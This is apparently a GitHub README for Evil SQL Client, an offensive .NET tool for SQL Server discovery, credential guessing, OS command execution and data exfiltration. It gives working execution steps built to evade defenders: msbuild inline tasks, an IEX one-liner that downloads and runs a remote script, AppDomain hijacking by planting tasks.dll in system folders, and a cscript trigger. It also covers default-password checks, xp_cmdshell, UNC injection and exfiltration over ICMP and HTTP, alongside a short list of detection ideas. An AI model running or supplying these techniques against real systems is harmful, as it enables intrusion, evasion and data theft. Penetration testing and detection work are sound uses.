Skip to content
/ ESC Public

Evil SQL Client (ESC) is an interactive .NET SQL console client with enhanced SQL Server discovery, access, and data exfiltration features. While ESC can be a handy SQL Client for daily tasks, it was originally designed for targeting SQL Servers during penetration tests and red team engagements. The intent of the project is to provide an .exe, b…

License

Notifications You must be signed in to change notification settings

NetSPI/ESC

Repository files navigation

evilsqlclient

--------------------------
Evil SQL Client (ESC)
Version: v1.0
Author: Scott Sutherland (@_nullbind), NetSPI 2020

Evil SQL Client (ESC) is an interactive .NET SQL console client with enhanced SQL Server discovery, access, and data exfiltration features. While ESC can be a handy SQL Client for daily tasks, it was originally designed for targeting Active Directory domain joined SQL Servers during penetration tests and red team engagements. The intent of the project is to provide an .exe, but also sample files for execution through mediums like msbuild and PowerShell.

Most of ESC's functionality is based on the PowerUpSQL, DAFT, SQLC2, and SQLInjectionWiki projects which are also related to SQL Server. At the moment ESC does not have full feature parity with the PowerUpSQL or DAFT, but the most useful bits are there.

Below is a summary of what is covered in this readme:

Execution Options

Command Options

Detections

  • MSBuild Tests: Resource1
  • MSBuild Detection: Resource1 | Resource2
  • SQL Server Detection: Resource1
  • AppDomain Detection - Consider monitoring for tasks.dll being written to c:\Windows\SysWow64\Tasks\ and c:\Windows\System32\Tasks, affected files being copied out of system and program file directories, or the "APPDOMAIN_MANAGER_TYPE" and "COMPLUS_Version" environmental variables being set via the command line or via scripting engines. Disclaimer: I haven't tested the AppDomain detections on scale so I dont know how much white noise they will produce.

Execution Options

Below is a list of options for running the Evil SQl Client (ESC).

Compile Source and Run Exe

  1. Download the source from esc folder.
  2. Open the esc.sln file in Visual Studio.
  3. Select Build -> Build Solution.
  4. Run esc.exe.

buildesc

Download Release and Run Exe

  1. Download compiled esc.exe from releases.
  2. Run esc.exe.

runescexe

Download and Run through MSbuild.exe

Evil SQL Client console can be run through msbuild inline tasks using the esc.csproj file or esc.xml file.
Using msbuild.exe to execute .net code through inline tasks is a technique that was researched and popularized by Casey Smith.

esc.proj
esc.proj includes all of the original Evil SQL Client (ESC) C Sharp source code inline. The inline .NET source code technique used in this variation seems to do a better job of avoiding detection than embedding the exe and calling through reflection.

esc.xml
esc.xml works a little differently and has the entire esc.exe hardcoded as a string which is then loaded through reflection using a technique highlighted in the GhostBuild project by @bohops. I should note that Windows Defender is pretty good at identifying this exe wrapping technique out of the box.

Updating esc.xml:
To update the esc.xml follow the instructions below:

  1. Download and compile esc.exe.
  2. Run Out-Compressdll (by @mattifestation) against esc.exe.
    Out-CompressedDll -FilePath esc.exe | out-file output.txt
  3. Replace the compressedBin string in esc.xml with the "EncodedCompressedFile" string generated from Out-CompressDll.
  4. Replace compressedBinSize with the size generated from Out-CompressDll.
  5. Run the script.
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe esc.xml

Execution Examples
Below are a few execution examples. Msbuild can accept a filepath on the command line, but no filepath is required if only one .csproj file exists in the directory your executing msbuild.exe from.

In the examples below, esc.csproj has been renamed to 1.csproj:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
runescexe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe esc.csproj
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe esc.xml
runescexe

Download and Run Functions through PowerShell

Below are some quick instructions for running ESC functions through PowerShell.

  1. Download esc.exe.
  2. Open PowerShell and load esc.exe through reflection.
    [System.Reflection.Assembly]::LoadFile("c:\temp\esc.exe")
  3. Alternatively, esc-example.ps1 contains a portable example generated using Out-Compressdll. It can be loaded using the PowerShell command below.
    IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/ESC/master/esc-example.ps1")
  4. After the assmbly is loaded you can run the desired function. Examples below.
[evilsqlclient.Program+EvilCommands]::GetSQLServersBroadCast()
[evilsqlclient.Program+EvilCommands]::GetSQLServersSpn()
[evilsqlclient.Program+EvilCommands]::MasterDiscoveredList
[evilsqlclient.Program+EvilCommands]::InstanceAllG = "enabled"
[evilsqlclient.Program+EvilCommands]::CheckAccess()
[evilsqlclient.Program+EvilCommands]::MasterAccessList
[evilsqlclient.Program+EvilCommands]::CheckDefaultAppPw()
[evilsqlclient.Program+EvilCommands]::CheckLoginAsPw()
[evilsqlclient.Program+EvilCommands]::MasterAccessList

Download and Run through AppDomain Hijacking

Application domains provide an isolation boundary for security, reliability, and versioning, and for unloading .NET assemblies. Application domains are typically created by runtime hosts, which are responsible for bootstrapping the common language runtime before an application is run. A typical application loads several assemblies into an application domain before the code they contain can be executed. The default AppDomainManager can be replaced by setting the APPDOMAIN_MANAGER_ASM and APPDOMAIN_MANAGER_TYPE environmental variables. This provides users with the means load and execute .NET code from custom assemblies prior to the execution of the intended application, but within their process and thread.

Reference: https://docs.microsoft.com/en-us/dotnet/framework/app-domains/application-domains

It is possible to leverage that functionality and default write access to the c:\windows\system32\tasks\ directory to execute arbitrary .NET code through c:\windows\system32\ and c:\windows\SysWow64\ assemblies that import mscoree.dll. This technique was originally shared during Casey Smith's DerbyCon presentation ".Net Manifesto - Win Friends and Influence the Loader".

Below are instructions for executing ESC using this method.

  1. Compile esc-appdomain-hijack.cs to tasks.dll.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.Reflection.dll /r:System.IO.Compression.dll /r:System.Runtime.InteropServices.dll /r:System.EnterpriseServices.dll /target:library /out:tasks.dll esc-appdomain-hijack.cs			
  1. Update environment variables. Note: process, user, or system could be targeted.
set APPDOMAIN_MANAGER_ASM=tasks, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
set APPDOMAIN_MANAGER_TYPE=Esc
set COMPLUS_Version=v4.0.30319
  1. Copy tasks.dll to target directories.
copy tasks.dll C:\Windows\System32\Tasks\tasks.dll 
copy tasks.dll C:\Windows\SysWow64\Tasks\tasks.dll
  1. Identify .exe in c:\windows\system32\ that load mscoreee.dll. This can be done quickly using the Get-PE function from Matt Graeber's PowerShell Arsenal Project.
gci c:\windows\system32\*.exe | get-pe | where-object {$_.Imports.ModuleName -Contains "mscoree.dll"} | Select ModuleName -ExpandProperty modulename
  1. Choose one of the affected commands and run it.
Examples:
C:\windows\system32\acu.exe
C:\windows\system32\aitstatic.exe
C:\windows\system32\ClusterUpdateUI.exe
C:\windows\system32\dsac.exe
C:\windows\system32\FileHistory.exe
C:\windows\system32\LbfoAdmin.exe
C:\windows\system32\Microsoft.Uev.SyncController.exe
C:\windows\system32\mtedit.exe
C:\windows\system32\PresentationHost.exe
C:\windows\system32\RAMgmtUI.exe
C:\windows\system32\ScriptRunner.exe
C:\windows\system32\ServerManager.exe
C:\windows\system32\ShieldingDataFileWizard.exe
C:\windows\system32\stordiag.exe
C:\windows\system32\SynapticsUtility.exe
C:\windows\system32\TemplateDiskWizard.exe
C:\windows\system32\TsWpfWrp.exe
C:\windows\system32\UevAgentPolicyGenerator.exe
C:\windows\system32\UevAppMonitor.exe
C:\windows\system32\UevTemplateBaselineGenerator.exe
C:\windows\system32\UevTemplateConfigItemGenerator.exe
C:\windows\system32\Vmw.exe

runappdomain

This can also be done by copying the affected EXE and the tasks.dll to a directory that's writable by the user. To detect those scenarios, consider monitoring for files being copied from system directories. However, note that attackers may be able to identify other affected EXEs on the system using the same discovery technique listed above.

runappdomain

Using the steps below ESC can also be executed using cscript.exe once the tasks.dll has been written to disk. Once again, based on Casey Smith's templates.

  1. Create the file trigger.js with the content below.
new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'c:\\Windows\\System32\\Tasks';
new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_ASM') = 'tasks, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null';
new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_TYPE') = 'Esc';
var o = new ActiveXObject("System.Object"); 
  1. Execute it using cscript.exe.
cscript trigger.js

runappdomain2

Note: Detections could include monitoring for tasks.dll being written to C:\Windows\System32\Tasks\tasks.dll and C:\Windows\SysWow64\Tasks\tasks.dll. Also, potentially the execution of the commands above without/with parameters.

ESC can also be executed through AppDomain hijacking using a configuration file.

  1. Create a configuration file in same folder as the target assembly, and name it after the target binary. Example below.
ScriptRunner.exe.config
  1. Below is sample XML for the config file.
<configuration>
<runtime>
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
<probing privatePath="C:\Windows\Tasks"/> </assemblyBinding>
<appDomainManagerAssembly value="Tasks, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null" />
<appDomainManagerType value="Esc" />
</runtime>
</configuration>
  1. Run the target binary.
ScriptRunner.exe

Note: Alternatively, the assemblyBinding and probing tags can be removed from the configuration file and replaced with the tag within the runtime tag. If that tag is present in the configuration file, the .NET application will attempt to use the DEVPATH environmental variable as a search path for referenced assemblies. As such, it can be used as an alternative to probing.

Reference: https://learn.microsoft.com/en-us/dotnet/framework/configure-apps/how-to-locate-assemblies-by-using-devpath

Supported Commands

COMMAND LIST

    SHOW:
     show settings 			Show connection and exfil settings.
     show discovered 			Show discovered instances. 
     show access  			Show accessible instances, versions, and other information.
     show help 				Show this help page.
 
    CONFIGURE INSTANCE:
     set targetall			Target all accessible SQL Server instances. List with 'show access' command.
     set instance instancename		Target a single instance.  Instance formats supported include: 
 				    	server1
 				    	server1\instance1
 				    	server1,1433
     set connstring stringhere 		Set a custom connection string. Examples below.
				   	 Server=Server\Instance;Database=Master;Integrated Security=SSPI;Connection Timeout=1
				    	Server=Server\Instance;Database=Master;Integrated Security=SSPI;Connection Timeout=1;uid=Domain\Account;pwd=Password;
				    	Server=Server\Instance;Database=Master;Connection Timeout=1;User ID=Username;Password=Password
 
    CONFIGURE CREDENTIALS:
     set username username 		User for authenticatiing to SQL Server instances.
 				   	Defaults to current Windows user if no username or password is provided, but access SQL Login credentials.
     set password password		Password for the provided username.  
 				    	Defaults to current Windows user if no user or password is provided.
 
    QUERY COMMANDS:
     set timeout 1			Set query timeout. Useful over slow connections.
     query				Arbitrary TSQL query can be executed once a valid connection string is configured.
				    	To run against all accessible instances type 'set targetall enabled'.
				    	Type the query, then go, and press enter. Multi-line queries are supported.
				    	Note: You don't have to type the word 'query'.
				    	Example:
				    	SELECT @@VERSION
				    	GO
 
    DISCOVERY COMMANDS:
     discover broadcast			Discover SQL Server instances via a broadcast request.
     discover domainspn			Discover SQL Server instances via LDAP query to the default DC for MSSQL SPNs.
     discover file filepath		Discover SQL Server instance listed in a file.  One per line.
				    	Format examples: 
				    	hostname 
				    	hostname\instance
				    	hostname,port
     show discovered			Display the list of discovered SQL Server instances.
     export discovered outpath		Export the list of discovered SQL Server instances to a file. 
				   	 Example: export discovered c:\windows\temp\sqlinstances.txt
     clear discovered			Clear list of discovered SQL Server instances.

    INITAL ACCESS COMMANDS:
     check access			Attempts to log into all discovered SQL Server instances.  
 				    	Uses current Windows/Domain user by default. 
				    	Note: Will use alternative credentials if provided. (set username / set password)
     show access			List SQL Server instances that can be logged into.
     export access outpath		Export list of SQL Server instances that can be logged into to a file.
     clear access			Clear the in memory list of SQL Server instances that can be logged into.			
     check defaultlogins		Attempts to identify SQL Server instances that match known application and attempts the associate usernames and passwords.


    POST EXPLOITATION COMMANDS:
     list serverinfo			List server information for accessoble target SQL Server instances.
     list databases			List databases for accessoble target SQL Server instances.
     list tables			List tables information for accessoble target SQL Server instances.
  				    	Limits results to databases the login user has access to.
     list links				List links information for accessoble target SQL Server instances.
     list logins			List logins information for accessoble target SQL Server instances.
     list rolemembers			List rolemember information for accessoble target SQL Server instances.
     list privs				Check accessible target SQL Server instances for logins that use their login as a password.  
     check loginaspw     		Check accessible target SQL Server instances for logins that use their login as a password.                         
     check uncinject IP			Connect to taret SQL Server instance and perform UNC injection back to provide IP.	     
     run OSCMD command			Run os command through xp_cmdshell on the accessible target SQL Server instances. 
 				    	*Requires sysadmin privileges.
 
    CONFIGURE DATA EXFILTRATION: 
     set file enabled
     set filepath c:\temp\file.csv
     set icmp tenabled
     set icmpip 127.0.0.1
     set http enabled
     set httpurl http://127.0.0.1
     set encrypt enabled
     set enckey MyKey!
     set encsalt MySalt!

    MISC COMMANDS:
     help
     clear
     exit
 

Common Command Sequences

Below are some common command examples to get you started.

Discovering SQL Server Instances
Below are a few common methods to identify SQL Server on the network and domain without port scanning.

discover domainspn examplescenario

discover broadcast examplescenario

show discovered examplescenario

Checking Access to Discovered Instances
After discovery, check access can be used to determine if the current or provided credentials can login into the discovered SQL Server instances.

set targetall enabled
show settings examplescenario

check access examplescenario

show access examplescenario

Query Single Target
Below are commands that can be used to target and query a single SQL Server instance.

First configure ESC to target a single instance. This will automatically disable the "targetall" setting.

Set target MSSQLSRV04\SQLSERVER2014
Set username backdoor_account
Set password backdoor_account
Show settings
examplescenario

Next simply execute your query and end your TSQL with the keyword "go".

select @@version
go
examplescenario

You can also run "list" and other post exploitation commands against the target instance.

examplescenario

Query Multiple Targets
Below are commands that can be used to target and query all accessible SQL Server instances.

  1. Import a list of target instances with the discover file, discover domainspn, or discover broadcast commands.
  2. Identify which instances you can log into.
    check access
  3. Enable multi instance targeting using the command below. Once enabled all commands and queries will be run against all accessible SQL Server instances.

    set targetall enabled
    show settings
  4. Run query as normal.
    select @@version
    go

Testing for Common Password Issues
Below are some checks for common password issues that can be used to gain initial entry and escalate privileges in some environments. If "targetall" is enabled the commands below with target all discovered or accessible instances. However, if a single instance is provided, then "targetall" will automatically be disabled to ensure only the one instance is targeted.

check defaultpw
check defaultpw is run against discovered instances and does not require valid credentials.
Related Reading
examplescenario

check loginaspw
check loginaspw can be used once authenticated to enumerated all logins and test if they are using the login as the password.
Related Reading
examplescenario
examplescenario

Running OS Commands
Below is a ESC command for running OS commands on target instances. It requires sysadmin privileges.

run oscmd whoami
examplescenario

Saving List of Accessible Servers
The command below can be used to export a list of servers that you can log into.
export access c:\temp\access.csv
examplescenario
examplescenario

Data Exfiltration Example: Local File
Below is an example of how to exfiltrate data to a local file.

set file enabled
set filepath c:\temp\output.csv examplescenario

select @@version examplescenario
examplescenario

Data Exfiltration Example: ICMP
Below is an example of how to exfiltrate data over ICMP with ESC.

set icmp enabled
set icmpip 192.168.1.1 examplescenario

select @@version examplescenario
examplescenario

Pending Commands

  • Add logging w/ timestamps
  • Add discover local
  • Add discover udpscan
  • Add column find
  • Add domain account enumeration
  • Add link crawl + linkquery + linkoscmd
  • Add escalate dbowner
  • Add escalate imperonsate
  • Threading
  • Finish data encryption
  • Create python/powershell script to decrypt encrypted exfiltrated data
  • Rewrite query function to be more flexible

Pending fixes

  • Crashes when you just type go
  • Crashes when you type ctrl+c

Thank You

Below is a list of people who tested out esc and/or provided .net development guidance. Thanks for all the help!

  • Alexander Leary (@0xbadjuju)
  • Ivan Da Silva (@humble_desser)
  • Josh Weber
  • Kevin Robertson (@kevin_robertson)

About

Evil SQL Client (ESC) is an interactive .NET SQL console client with enhanced SQL Server discovery, access, and data exfiltration features. While ESC can be a handy SQL Client for daily tasks, it was originally designed for targeting SQL Servers during penetration tests and red team engagements. The intent of the project is to provide an .exe, b…

Resources

License

Stars

Watchers

Forks

Packages

No packages published